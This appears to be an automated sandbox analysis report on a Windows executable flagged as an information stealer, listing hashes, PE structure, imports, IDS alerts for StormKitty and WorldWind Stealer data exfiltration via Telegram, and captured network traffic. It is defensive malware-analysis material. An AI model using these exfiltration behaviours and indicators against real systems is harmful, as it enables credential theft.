Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.9663143247978425
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6mllsKaB2q.exe
File size:	1'116'672 bytes
MD5:	a7649256fce8b15959edd1004df7781b
SHA1:	314294d940b110265283531e9e62b3dea6fb4506
SHA256:	850fa36792359354c8b5cf86ebb2d6923aa64dece7fc5d555d90d156eaa0409e
SHA512:	8b06a739f05a731d7edafe7bbc9b6a6e083dbb3d8d96fe1bba110147401caf8bd1b51268cf1db0ad15dbd92b584c3a3d6174dfdee47669b9f8b6510735c4cf5b
SSDEEP:	24576:2qDEvCTbMWu7rQYlBQcBiT6rprG8a61V9rWmEbmJsR:2TvC/MTQYxsWR7a6H9rbESJ
TLSH:	3035BF0273C1C062FF9B96334B5AF6515BBC6A260123E62F13981D79BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6762A83C [Wed Dec 18 10:47:24 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F7FDCBB3CF3h
jmp 00007F7FDCBB35FFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F7FDCBB37DDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F7FDCBB37AAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F7FDCBB639Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F7FDCBB63E8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F7FDCBB63D1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x3a000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10e000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x3a000	0x3a000	bb103ace3f8df1957409736962b0caed	False	0.8874848464439655	data	7.792847081547041	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10e000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x312c5	data			1.0003525095202395
RT_GROUP_ICON	0x10da80	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x10daf8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x10db0c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x10db20	0x14	data	English	Great Britain	1.25
RT_VERSION	0x10db34	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x10dc10	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T19:09:03.360781+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.7	49788	149.154.167.220	443	TCP
2025-01-10T19:09:03.360781+0100	2031009	ET MALWARE StormKitty Data Exfil via Telegram	1	192.168.2.7	49788	149.154.167.220	443	TCP
2025-01-10T19:09:03.360781+0100	2044766	ET MALWARE WorldWind Stealer Checkin via Telegram (GET)	1	192.168.2.7	49788	149.154.167.220	443	TCP
2025-01-10T19:09:04.353260+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49794	149.154.167.220	443	TCP
2025-01-10T19:09:04.353260+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.7	49794	149.154.167.220	443	TCP
2025-01-10T19:09:05.417812+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49802	149.154.167.220	443	TCP
2025-01-10T19:09:08.157541+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.7	49819	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 19:09:00.301390886 CET	49768	80	192.168.2.7	104.16.185.241
Jan 10, 2025 19:09:00.306322098 CET	80	49768	104.16.185.241	192.168.2.7
Jan 10, 2025 19:09:00.306404114 CET	49768	80	192.168.2.7	104.16.185.241
Jan 10, 2025 19:09:00.307154894 CET	49768	80	192.168.2.7	104.16.185.241
Jan 10, 2025 19:09:00.311938047 CET	80	49768	104.16.185.241	192.168.2.7
Jan 10, 2025 19:09:00.778568029 CET	80	49768	104.16.185.241	192.168.2.7
Jan 10, 2025 19:09:00.819787025 CET	49768	80	192.168.2.7	104.16.185.241
Jan 10, 2025 19:09:00.857084036 CET	49775	443	192.168.2.7	172.67.196.114
Jan 10, 2025 19:09:00.857125998 CET	443	49775	172.67.196.114	192.168.2.7
Jan 10, 2025 19:09:00.857471943 CET	49775	443	192.168.2.7	172.67.196.114
Jan 10, 2025 19:09:00.864196062 CET	49775	443	192.168.2.7	172.67.196.114
Jan 10, 2025 19:09:00.864242077 CET	443	49775	172.67.196.114	192.168.2.7
Jan 10, 2025 19:09:01.323736906 CET	443	49775	172.67.196.114	192.168.2.7
Jan 10, 2025 19:09:01.323801041 CET	49775	443	192.168.2.7	172.67.196.114
Jan 10, 2025 19:09:01.325484991 CET	49775	443	192.168.2.7	172.67.196.114
Jan 10, 2025 19:09:01.325489998 CET	443	49775	172.67.196.114	192.168.2.7
Jan 10, 2025 19:09:01.325727940 CET	443	49775	172.67.196.114	192.168.2.7
Jan 10, 2025 19:09:01.366683960 CET	49775	443	192.168.2.7	172.67.196.114
Jan 10, 2025 19:09:01.366846085 CET	49775	443	192.168.2.7	172.67.196.114
Jan 10, 2025 19:09:01.407331944 CET	443	49775	172.67.196.114	192.168.2.7
Jan 10, 2025 19:09:02.482253075 CET	443	49775	172.67.196.114	192.168.2.7
Jan 10, 2025 19:09:02.482311964 CET	443	49775	172.67.196.114	192.168.2.7
Jan 10, 2025 19:09:02.482391119 CET	49775	443	192.168.2.7	172.67.196.114
Jan 10, 2025 19:09:02.484289885 CET	49775	443	192.168.2.7	172.67.196.114
Jan 10, 2025 19:09:02.487200975 CET	49768	80	192.168.2.7	104.16.185.241
Jan 10, 2025 19:09:02.492165089 CET	80	49768	104.16.185.241	192.168.2.7
Jan 10, 2025 19:09:02.492216110 CET	49768	80	192.168.2.7	104.16.185.241
Jan 10, 2025 19:09:02.495835066 CET	49788	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:02.495949030 CET	443	49788	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:02.496082067 CET	49788	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:02.496413946 CET	49788	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:02.496454000 CET	443	49788	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:03.149302959 CET	443	49788	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:03.149399042 CET	49788	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:03.153238058 CET	49788	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:03.153249025 CET	443	49788	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:03.153578043 CET	443	49788	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:03.163153887 CET	49788	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:03.163202047 CET	443	49788	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:03.360882998 CET	443	49788	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:03.361061096 CET	443	49788	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:03.361236095 CET	49788	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:03.363806963 CET	49788	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:03.372571945 CET	49794	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:03.372626066 CET	443	49794	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:03.372689962 CET	49794	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:03.372899055 CET	49794	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:03.372905016 CET	443	49794	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:03.990783930 CET	443	49794	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:03.993968964 CET	49794	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:03.994002104 CET	443	49794	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:04.353310108 CET	443	49794	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:04.353487015 CET	443	49794	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:04.353553057 CET	49794	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:04.354011059 CET	49794	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:04.507802963 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:04.507837057 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:04.507898092 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:04.509542942 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:04.509555101 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.115669966 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.119540930 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.119554996 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.417834044 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.420891047 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.420902014 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.421941042 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.421947956 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.422199965 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.422224045 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.422513008 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.422535896 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.422635078 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.422672987 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.422909021 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.422938108 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.422972918 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.422998905 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.423008919 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.423012018 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.423141003 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.423146963 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.423201084 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.423230886 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.423268080 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.423274040 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.423281908 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.423289061 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:05.423333883 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:05.432524920 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:06.178123951 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:06.178267956 CET	443	49802	149.154.167.220	192.168.2.7
Jan 10, 2025 19:09:06.178317070 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:06.179042101 CET	49802	443	192.168.2.7	149.154.167.220
Jan 10, 2025 19:09:06.188319921 CET	49813	443	192.168.2.7	172.67.19.24
Jan 10, 2025 19:09:06.188354969 CET	443	49813	172.67.19.24	192.168.2.7
Jan 10, 2025 19:09:06.188452959 CET	49813	443	192.168.2.7	172.67.19.24
Jan 10, 2025 19:09:06.188807011 CET	49813	443	192.168.2.7	172.67.19.24
Jan 10, 2025 19:09:06.188817024 CET	443	49813	172.67.19.24	192.168.2.7
Jan 10, 2025 19:09:06.656759977 CET	443	49813	172.67.19.24	192.168.2.7
Jan 10, 2025 19:09:06.656852007 CET	49813	443	192.168.2.7	172.67.19.24
Jan 10, 2025 19:09:06.707226038 CET	49813	443	192.168.2.7	172.67.19.24
Jan 10, 2025 19:09:06.707268000 CET	443	49813	172.67.19.24	192.168.2.7
Jan 10, 2025 19:09:06.707633018 CET	443	49813	172.67.19.24	192.168.2.7
Jan 10, 2025 19:09:06.711330891 CET	49813	443	192.168.2.7	172.67.19.24
